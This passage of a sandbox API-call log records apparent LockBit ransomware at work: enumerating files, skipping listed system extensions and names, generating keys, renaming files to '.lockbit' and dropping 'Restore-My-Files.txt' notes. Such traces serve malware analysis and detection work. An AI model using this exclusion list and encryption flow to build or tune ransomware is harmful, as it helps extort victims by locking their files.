hTemplateFile=0x0) returned 0x2f4 [0120.637] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.637] malloc (_Size=0x40068) returned 0x1ff1e60 [0120.637] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14174) returned 1 [0120.637] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0120.638] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.638] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0120.638] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0120.641] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.641] malloc (_Size=0xa6) returned 0x77d7a8 [0120.641] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.642] free (_Block=0x77d7a8) [0120.642] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.642] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.642] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4dba, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0089945.WMF", cAlternateFileName="")) returned 1 [0120.642] lstrcmpiW (lpString1=".", lpString2="J0089945.WMF") returned -1 [0120.642] lstrcmpiW (lpString1="..", lpString2="J0089945.WMF") returned -1 [0120.642] PathFindExtensionW (pszPath="J0089945.WMF") returned=".WMF" [0120.642] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.642] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.643] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.643] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0089945.WMF") returned 1 [0120.644] lstrcmpiW (lpString1="ntldr", lpString2="J0089945.WMF") returned 1 [0120.644] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0089945.WMF") returned 1 [0120.644] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0089945.WMF") returned -1 [0120.644] lstrcmpiW (lpString1="autorun.inf", lpString2="J0089945.WMF") returned -1 [0120.644] lstrcmpiW (lpString1="thumbs.db", lpString2="J0089945.WMF") returned 1 [0120.644] lstrcmpiW (lpString1="iconcache.db", lpString2="J0089945.WMF") returned -1 [0120.644] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.644] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF") returned=".WMF" [0120.644] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.644] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.644] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.645] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.645] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.lockbit") returned 72 [0120.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089945.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0120.646] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.646] malloc (_Size=0x40068) returned 0x3df0008 [0120.646] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19898) returned 1 [0120.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0120.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0120.647] ReadFile (in: hFile=0x13c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0120.650] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.650] malloc (_Size=0xa6) returned 0x77d7a8 [0120.650] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.651] free (_Block=0x77d7a8) [0120.651] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089945.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.651] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.651] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3d40, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0089992.WMF", cAlternateFileName="")) returned 1 [0120.651] lstrcmpiW (lpString1=".", lpString2="J0089992.WMF") returned -1 [0120.651] lstrcmpiW (lpString1="..", lpString2="J0089992.WMF") returned -1 [0120.651] PathFindExtensionW (pszPath="J0089992.WMF") returned=".WMF" [0120.651] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.651] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.652] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.652] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0089992.WMF") returned 1 [0120.653] lstrcmpiW (lpString1="ntldr", lpString2="J0089992.WMF") returned 1 [0120.653] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0089992.WMF") returned 1 [0120.653] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0089992.WMF") returned -1 [0120.653] lstrcmpiW (lpString1="autorun.inf", lpString2="J0089992.WMF") returned -1 [0120.653] lstrcmpiW (lpString1="thumbs.db", lpString2="J0089992.WMF") returned 1 [0120.653] lstrcmpiW (lpString1="iconcache.db", lpString2="J0089992.WMF") returned -1 [0120.653] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0120.653] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF") returned=".WMF" [0120.653] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0120.653] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0120.653] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0120.654] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0120.654] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.lockbit") returned 72 [0120.654] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0089992.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0120.658] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0120.658] malloc (_Size=0x40068) returned 0x3d70450 [0120.658] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=15680) returned 1 [0120.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0120.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0120.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0120.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0120.659] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0120.661] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0120.661] malloc (_Size=0xa6) returned 0x77d7a8 [0120.661] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0120.662] free (_Block=0x77d7a8) [0120.662] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0089992.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0120.662] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0120.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0120.662] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x562d5870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5314, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0090027.WMF", cAlternateFileName="")) returned 1 [0120.662] lstrcmpiW (lpString1=".", lpString2="J0090027.WMF") returned -1 [0120.662] lstrcmpiW (lpString1="..", lpString2="J0090027.WMF") returned -1 [0120.662] PathFindExtensionW (pszPath="J0090027.WMF") returned=".WMF" [0120.662] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0120.662] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0120.662] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0120.663] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0120.664] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0120.664] lstrcmpiW (lpString1=".sys", lpString2=".WMF") 